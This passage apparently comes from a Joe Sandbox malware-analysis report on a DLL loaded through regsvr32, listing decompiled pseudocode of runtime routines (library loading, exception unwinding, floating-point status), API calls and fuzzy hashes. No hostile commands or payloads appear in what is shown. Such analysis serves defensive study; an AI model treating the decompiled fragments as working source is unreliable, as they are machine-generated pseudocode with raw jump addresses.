                                                                                            				if (_t61 == _t101) goto 0x800046eb;
                                                                                            				if (_t61 != 0) goto 0x800046ed;
                                                                                            				if (__r8 == __r9) goto 0x800046e3;
                                                                                            				_t67 =  *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8));
                                                                                            				if (_t67 == 0) goto 0x8000462e;
                                                                                            				if (_t67 != _t101) goto 0x800046c5;
                                                                                            				goto 0x80004699;
                                                                                            				r8d = 0x800;
                                                                                            				LoadLibraryExW(_t104, _t100, _t97);
                                                                                            				_t68 = _t61;
                                                                                            				if (_t61 != 0) goto 0x800046a5;
                                                                                            				if (GetLastError() != 0x57) goto 0x80004687;
                                                                                            				_t14 = _t68 + 7; // 0x7
                                                                                            				r8d = _t14;
                                                                                            				if (E00000001180007070(__r8) == 0) goto 0x80004687;
                                                                                            				r8d = 0;
                                                                                            				LoadLibraryExW(??, ??, ??);
                                                                                            				if (_t61 != 0) goto 0x800046a5;
                                                                                            				 *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8)) = _t101;
                                                                                            				goto 0x8000460c;
                                                                                            				_t21 = 0x180000000 + 0x221f0 + __rsi * 8;
                                                                                            				_t65 =  *_t21;
                                                                                            				 *_t21 = _t61;
                                                                                            				if (_t65 == 0) goto 0x800046c5;
                                                                                            				FreeLibrary(_t94);
                                                                                            				GetProcAddress(_t81);
                                                                                            				if (_t65 == 0) goto 0x800046e3;
                                                                                            				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t65;
                                                                                            				goto 0x800046ed;
                                                                                            				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t101;
                                                                                            				return 0;
                                                                                            			}

                                                                                            Instruction addresses (one per decompiled statement, collapsed from the report's address column): 0x1800045bc, 0x1800045c1, 0x1800045c6, 0x1800045e1, 0x1800045ee, 0x1800045fa, 0x180004603, 0x18000460c, 0x180004615, 0x180004621, 0x180004626, 0x18000462c, 0x18000463b, 0x180004641, 0x180004647, 0x18000464d, 0x180004658, 0x18000465a, 0x18000465a, 0x18000466f, 0x180004671, 0x180004679, 0x180004685, 0x180004691, 0x1800046a0, 0x1800046af, 0x1800046af, 0x1800046af, 0x1800046ba, 0x1800046bf, 0x1800046cb, 0x1800046d4, 0x1800046d9, 0x1800046e1, 0x1800046e3, 0x180004709

                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004641
                                                                                            • GetLastError.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 000000018000464F
                                                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004679
                                                                                            • FreeLibrary.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046BF
                                                                                            • GetProcAddress.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046CB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                            • String ID: api-ms-
                                                                                            • API String ID: 2559590344-2084034818
                                                                                            • Opcode ID: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
                                                                                            • Instruction ID: a281eee05f5572a15ea3fe0403c4f12dabc44bbec878773a6143b276462e3048
                                                                                            • Opcode Fuzzy Hash: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
                                                                                            • Instruction Fuzzy Hash: 9F31F276302B48A1EE93DB02A8007D533E4B70DBE4F598625BE2D0B3A0EF39C24C8705
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 2506987500-0
                                                                                            • Opcode ID: d817b626ecd357e902e01f6c1570ab9f2756ec5fc51f0da8eea91c9e6fa7d082
                                                                                            • Instruction ID: c3c6b15d1e2a8e36adeeaa1ee2c0ab8803bf36c1bad1bc725f34006b2089cb00
                                                                                            • Opcode Fuzzy Hash: d817b626ecd357e902e01f6c1570ab9f2756ec5fc51f0da8eea91c9e6fa7d082
                                                                                            • Instruction Fuzzy Hash: A5214F3470668C42FAE7E73195553ED72926B6C7F0F58C624B83A07BDBDE6C8A494700
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                            • String ID: CONOUT$
                                                                                            • API String ID: 3230265001-3130406586
                                                                                            • Opcode ID: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
                                                                                            • Instruction ID: 0de398e34c1669cec19602a54f8a011ae7faefe96049ea3591aa14d2bab58b4a
                                                                                            • Opcode Fuzzy Hash: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
                                                                                            • Instruction Fuzzy Hash: 7F115B31610F4886E7939B52F85439A73A0F79CBE4F048225FA5E87BA4CF78CA488740
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: LoadMessage$StringTranslate$AcceleratorClassCreateCursorDispatchRegisterWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1967609040-0
                                                                                            • Opcode ID: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
                                                                                            • Instruction ID: 677205889e0bc738131920ca4d71d6e0d0c6d5bcb4ac294ec7d30bf60c9b59c6
                                                                                            • Opcode Fuzzy Hash: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
                                                                                            • Instruction Fuzzy Hash: 8611B932614E89D2E7A2DB61F8517DA7361F7D8784F508121FA8947A79DF3CC7198B00
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 63%
                                                                                            			E00000001180003B5C(void* __esi, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
                                                                                            				signed int _v32;
                                                                                            				long long _v40;
                                                                                            				char _v48;
                                                                                            				signed int* _v56;
                                                                                            				void* _t55;
                                                                                            				intOrPtr _t60;
                                                                                            				signed int _t101;
                                                                                            				void* _t109;
                                                                                            				intOrPtr _t111;
                                                                                            				signed int* _t115;
                                                                                            				intOrPtr* _t136;
                                                                                            				void* _t139;
                                                                                            				void* _t142;
                                                                                            				void* _t144;
                                                                                            				void* _t158;
                                                                                            				void* _t159;
                                                                                            
                                                                                            				_t109 = _t144;
                                                                                            				 *((long long*)(_t109 + 8)) = __rbx;
                                                                                            				 *((long long*)(_t109 + 0x10)) = __rbp;
                                                                                            				 *((long long*)(_t109 + 0x18)) = __rsi;
                                                                                            				 *((long long*)(_t109 + 0x20)) = __rdi;
                                                                                            				_t136 = __rcx;
                                                                                            				_t139 = __r9;
                                                                                            				_t159 = __r8;
                                                                                            				_t142 = __rdx;
                                                                                            				E00000001180004584(_t55, __r8);
                                                                                            				E00000001180002D40(_t109);
                                                                                            				_t115 = _a40;
                                                                                            				if ( *((intOrPtr*)(_t109 + 0x40)) != 0) goto 0x80003bde;
                                                                                            				if ( *__rcx == 0xe06d7363) goto 0x80003bde;
                                                                                            				if ( *__rcx != 0x80000029) goto 0x80003bc2;
                                                                                            				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x80003bc6;
                                                                                            				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0x80003bde;
                                                                                            				if ( *__rcx == 0x80000026) goto 0x80003bde;
                                                                                            				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003bde;
                                                                                            				if ((_t115[9] & 0x00000001) != 0) goto 0x80003d6d;
                                                                                            				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x80003c76;
                                                                                            				if (_t115[1] == 0) goto 0x80003d6d;
                                                                                            				if (_a48 != 0) goto 0x80003d6d;
                                                                                            				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x80003c63;
                                                                                            				if ( *__rcx != 0x80000026) goto 0x80003c41;
                                                                                            				_t60 = E00000001180002F2C(_t115, __r9,  *((intOrPtr*)(__r9 + 0x20)), __r9);
                                                                                            				if (_t60 - 0xffffffff < 0) goto 0x80003d8d;
                                                                                            				if (_t60 - _t115[1] >= 0) goto 0x80003d8d;
                                                                                            				r9d = _t60;
                                                                                            				E000000011800040F0(_t109, _t142, __r9, _t115);
                                                                                            				goto 0x80003d6d;
                                                                                            				if ( *_t136 != 0x80000029) goto 0x80003c63;
                                                                                            				r9d =  *((intOrPtr*)(_t136 + 0x38));
                                                                                            				if (r9d - 0xffffffff < 0) goto 0x80003d8d;
                                                                                            				if (r9d - _t115[1] >= 0) goto 0x80003d8d;
                                                                                            				goto 0x80003c31;
                                                                                            				E00000001180002004(r9d - _t115[1], _t109, _t115, __r9, __r9, _t115);
                                                                                            				goto 0x80003d6d;
                                                                                            				if (_t115[3] != 0) goto 0x80003cbe;
                                                                                            				if (( *_t115 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003c9e;
                                                                                            				_t101 = _t115[8];
                                                                                            				if (_t101 == 0) goto 0x80003c9e;
                                                                                            				E00000001180002408(_t109);
                                                                                            				if (_t101 != 0) goto 0x80003cbe;
                                                                                            				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003d6d;
                                                                                            				if ((_t115[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003d6d;
                                                                                            				if ( *_t136 != 0xe06d7363) goto 0x80003d34;
                                                                                            				if ( *((intOrPtr*)(_t136 + 0x18)) - 3 < 0) goto 0x80003d34;
                                                                                            				if ( *((intOrPtr*)(_t136 + 0x20)) - 0x19930522 <= 0) goto 0x80003d34;
                                                                                            				_t111 =  *((intOrPtr*)(_t136 + 0x30));
                                                                                            				if ( *((intOrPtr*)(_t111 + 8)) == 0) goto 0x80003d34;
                                                                                            				E0000000118000241C(_t111);
                                                                                            				if (_t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)) == 0) goto 0x80003d34;
                                                                                            				_v32 = _a64 & 0x000000ff;
                                                                                            				_v40 = _a56;
                                                                                            				_v48 = _a48;
                                                                                            				_v56 = _t115;
                                                                                            				 *0x80016370(_t158);
                                                                                            				goto 0x80003d72;
                                                                                            				_v32 = _a56;
                                                                                            				_v40 = _a48;
                                                                                            				_v48 = _a64;
                                                                                            				_v56 = _t115;
                                                                                            				E00000001180003328(_a64 & 0x000000ff, 0x80000026, __esi, _t136, _t142, _t159, _t139, _t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)));
                                                                                            				return 1;
                                                                                            			}

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
                                                                                            • String ID: csm$csm
                                                                                            • API String ID: 851805269-3733052814
                                                                                            • Opcode ID: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
                                                                                            • Instruction ID: ef6ae88387dfa06c815bde898961dd69fb07e80911919095ce8a45e838d8869a
                                                                                            • Opcode Fuzzy Hash: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
                                                                                            • Instruction Fuzzy Hash: C5617F3220078886EBB6CF26E44539877A9F758BD4F18C116EB9847BD5CF38D699C701
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 30%
                                                                                            			E00000001180002A84(void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r8, intOrPtr* __r9) {
                                                                                            				void* _t76;
                                                                                            				void* _t83;
                                                                                            				void* _t84;
                                                                                            				intOrPtr _t101;
                                                                                            				intOrPtr _t103;
                                                                                            				void* _t113;
                                                                                            				void* _t118;
                                                                                            				void* _t130;
                                                                                            				long long _t133;
                                                                                            				intOrPtr* _t135;
                                                                                            				signed long long _t144;
                                                                                            				void* _t150;
                                                                                            				signed long long _t154;
                                                                                            				void* _t156;
                                                                                            				long long _t158;
                                                                                            				intOrPtr* _t159;
                                                                                            				void* _t161;
                                                                                            				void* _t162;
                                                                                            				signed long long _t166;
                                                                                            				void* _t170;
                                                                                            				intOrPtr _t171;
                                                                                            				void* _t173;
                                                                                            				void* _t174;
                                                                                            				void* _t176;
                                                                                            				void* _t178;
                                                                                            				void* _t180;
                                                                                            				intOrPtr* _t181;
                                                                                            
                                                                                            				_t130 = __rax;
                                                                                            				 *((long long*)(_t161 + 8)) = __rbx;
                                                                                            				 *((long long*)(_t161 + 0x10)) = _t158;
                                                                                            				 *((long long*)(_t161 + 0x18)) = __rsi;
                                                                                            				_t162 = _t161 - 0x40;
                                                                                            				_t159 = __rcx;
                                                                                            				_t181 = __r9;
                                                                                            				_t174 = __rdx;
                                                                                            				E00000001180004584(_t76, __r8);
                                                                                            				_t171 =  *((intOrPtr*)(__r9 + 8));
                                                                                            				_t135 =  *((intOrPtr*)(__r9 + 0x38));
                                                                                            				_t178 =  *__r9 - _t171;
                                                                                            				_t103 =  *((intOrPtr*)(__r9 + 0x48));
                                                                                            				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x80002bac;
                                                                                            				 *((long long*)(_t162 + 0x30)) = __rcx;
                                                                                            				 *((long long*)(_t162 + 0x38)) = __r8;
                                                                                            				if (_t103 -  *_t135 >= 0) goto 0x80002c58;
                                                                                            				_t154 = __r8 + __r8;
                                                                                            				if (_t178 - _t130 < 0) goto 0x80002b9e;
                                                                                            				if (_t178 - _t130 >= 0) goto 0x80002b9e;
                                                                                            				if ( *((intOrPtr*)(_t135 + 0x10 + _t154 * 8)) == 0) goto 0x80002b9e;
                                                                                            				if ( *((intOrPtr*)(_t135 + 0xc + _t154 * 8)) == 1) goto 0x80002b2a;
                                                                                            				_t113 =  *((long long*)(_t130 + _t171))(_t180, _t176, _t173, _t170, _t150);
                                                                                            				if (_t113 < 0) goto 0x80002ba5;
                                                                                            				if (_t113 <= 0) goto 0x80002b9e;
                                                                                            				if ( *((intOrPtr*)(__rcx)) != 0xe06d7363) goto 0x80002b5b;
                                                                                            				if ( *0x800164f8 == 0) goto 0x80002b5b;
                                                                                            				if (E0000000118000F7F0(_t130 + _t171, _t135, 0x800164f8) == 0) goto 0x80002b5b;
                                                                                            				_t83 =  *0x800164f8();
                                                                                            				r8d = 1;
                                                                                            				_t84 = E00000001180004550(_t83, _t159 + _t171, _t174);
                                                                                            				_t101 =  *((intOrPtr*)(_t135 + 0x10 + _t154 * 8));
                                                                                            				r9d =  *_t159;
                                                                                            				 *((long long*)(_t162 + 0x28)) =  *((intOrPtr*)(_t181 + 0x40));
                                                                                            				_t133 =  *((intOrPtr*)(_t181 + 0x28));
                                                                                            				 *((long long*)(_t162 + 0x20)) = _t133;
                                                                                            				__imp__RtlUnwindEx();
                                                                                            				E00000001180004580(_t84);
                                                                                            				goto 0x80002ada;
                                                                                            				goto 0x80002c5d;
                                                                                            				_t156 =  *((intOrPtr*)(_t181 + 0x20)) - _t171;
                                                                                            				goto 0x80002c4e;
                                                                                            				_t144 = _t174 + _t174;
                                                                                            				if (_t178 - _t133 < 0) goto 0x80002c4c;
                                                                                            				_t118 = _t178 - _t133;
                                                                                            				if (_t118 >= 0) goto 0x80002c4c;
                                                                                            				r10d =  *(_t159 + 4);
                                                                                            				r10d = r10d & 0x00000020;
                                                                                            				if (_t118 == 0) goto 0x80002c21;
                                                                                            				r9d = 0;
                                                                                            				if (_t101 == 0) goto 0x80002c1c;
                                                                                            				r8d = r9d;
                                                                                            				_t166 = _t159 + _t159;
                                                                                            				if (_t156 - _t133 < 0) goto 0x80002c14;
                                                                                            				if (_t156 - _t133 >= 0) goto 0x80002c14;
                                                                                            				if ( *((intOrPtr*)(_t135 + 0x10 + _t166 * 8)) !=  *((intOrPtr*)(_t135 + 0x10 + _t144 * 8))) goto 0x80002c14;
                                                                                            				if ( *((intOrPtr*)(_t135 + 0xc + _t166 * 8)) ==  *((intOrPtr*)(_t135 + 0xc + _t144 * 8))) goto 0x80002c1c;
                                                                                            				r9d = r9d + 1;
                                                                                            				if (r9d - _t101 < 0) goto 0x80002be4;
                                                                                            				if (r9d != _t101) goto 0x80002c58;
                                                                                            				if ( *((intOrPtr*)(_t135 + 0x10 + _t144 * 8)) == 0) goto 0x80002c35;
                                                                                            				if (_t156 != _t133) goto 0x80002c4c;
                                                                                            				if (r10d != 0) goto 0x80002c58;
                                                                                            				goto 0x80002c4c;
                                                                                            				 *((intOrPtr*)(_t181 + 0x48)) = _t150 + 1;
                                                                                            				r8d =  *((intOrPtr*)(_t135 + 0xc + _t144 * 8));
                                                                                            				 *((long long*)(_t166 + _t171))();
                                                                                            				if (_t103 + 2 -  *_t135 < 0) goto 0x80002bb8;
                                                                                            				return 1;
                                                                                            			}
                                                                                            0x180002bfc
                                                                                            0x180002c07
                                                                                            0x180002c12
                                                                                            0x180002c14
                                                                                            0x180002c1a
                                                                                            0x180002c1f
                                                                                            0x180002c27
                                                                                            0x180002c2c
                                                                                            0x180002c31
                                                                                            0x180002c33
                                                                                            0x180002c3b
                                                                                            0x180002c3f
                                                                                            0x180002c49
                                                                                            0x180002c52
                                                                                            0x180002c7a

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                            • String ID: csm$f
                                                                                            • API String ID: 2395640692-629598281
                                                                                            • Opcode ID: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
                                                                                            • Instruction ID: 7da8602e18cf7747c8af8830ce248ccf40cfdad7849785c1bee6e388392e864c
                                                                                            • Opcode Fuzzy Hash: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
                                                                                            • Instruction Fuzzy Hash: D551BD32601A588AEBAADF15E844B9D37A5F348BC8F51C121FE1A47789DF74DA89C700
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                            • API String ID: 4061214504-1276376045
                                                                                            • Opcode ID: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
                                                                                            • Instruction ID: 6c3fae355f4def66f2243ece08b04bf3b1533bf3e7ed4235295a513a2b2c2168
                                                                                            • Opcode Fuzzy Hash: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
                                                                                            • Instruction Fuzzy Hash: 62F06D75714E0891FB92CB24E8443EA6371EB8DBE1F588215FA6A462F6CF2CC24CC300
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 85%
                                                                                            			E000000011800077FC(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                                                                                            				signed int _t27;
                                                                                            				signed int _t28;
                                                                                            				signed int _t29;
                                                                                            				signed int _t30;
                                                                                            				signed int _t31;
                                                                                            				signed int _t42;
                                                                                            				signed int _t43;
                                                                                            				signed int _t44;
                                                                                            				signed int _t46;
                                                                                            				void* _t51;
                                                                                            
                                                                                            				_a8 = __rbx;
                                                                                            				_a16 = __rsi;
                                                                                            				_t27 = __ecx & 0x0000001f;
                                                                                            				if ((__ecx & 0x00000008) == 0) goto 0x8000782e;
                                                                                            				if (sil >= 0) goto 0x8000782e;
                                                                                            				E0000000118000BC4C(_t27, _t51);
                                                                                            				_t28 = _t27 & 0xfffffff7;
                                                                                            				goto 0x80007885;
                                                                                            				_t42 = 0x00000004 & dil;
                                                                                            				if (_t42 == 0) goto 0x80007849;
                                                                                            				asm("dec eax");
                                                                                            				if (_t42 >= 0) goto 0x80007849;
                                                                                            				E0000000118000BC4C(_t28, _t51);
                                                                                            				_t29 = _t28 & 0xfffffffb;
                                                                                            				goto 0x80007885;
                                                                                            				_t43 = dil & 0x00000001;
                                                                                            				if (_t43 == 0) goto 0x80007865;
                                                                                            				asm("dec eax");
                                                                                            				if (_t43 >= 0) goto 0x80007865;
                                                                                            				E0000000118000BC4C(_t29, _t51);
                                                                                            				_t30 = _t29 & 0xfffffffe;
                                                                                            				goto 0x80007885;
                                                                                            				_t44 = dil & 0x00000002;
                                                                                            				if (_t44 == 0) goto 0x80007885;
                                                                                            				asm("dec eax");
                                                                                            				if (_t44 >= 0) goto 0x80007885;
                                                                                            				if ((dil & 0x00000010) == 0) goto 0x80007882;
                                                                                            				E0000000118000BC4C(_t30, _t51);
                                                                                            				_t31 = _t30 & 0xfffffffd;
                                                                                            				_t46 = dil & 0x00000010;
                                                                                            				if (_t46 == 0) goto 0x8000789f;
                                                                                            				asm("dec eax");
                                                                                            				if (_t46 >= 0) goto 0x8000789f;
                                                                                            				E0000000118000BC4C(_t31, _t51);
                                                                                            				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                                                                                            			}

                                                                                            Instruction addresses: 0x1800077fc to 0x1800078b5 (disassembly address column for E000000011800077FC; opcode text not present on the page)

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: _set_statfp
                                                                                            • String ID:
                                                                                            • API String ID: 1156100317-0
                                                                                            • Opcode ID: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
                                                                                            • Instruction ID: 766be9376166aa195c434f29f3971196c8b67f74f947fd55b9f7e9fcb960d4ba
                                                                                            • Opcode Fuzzy Hash: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
                                                                                            • Instruction Fuzzy Hash: 3D117736F90A0941F7EE9128D45A3E63141AB6C3F4F59C624B66E462E7CF2C4B59C305
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • FlsGetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008017
                                                                                            • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008036
                                                                                            • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000805E
                                                                                            • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000806F
                                                                                            • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008080
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value
                                                                                            • String ID:
                                                                                            • API String ID: 3702945584-0
                                                                                            • Opcode ID: bd0d3b981fc10e7cfe1f2c0abaf01122f4bff4453aed3835adc87ef51088108d
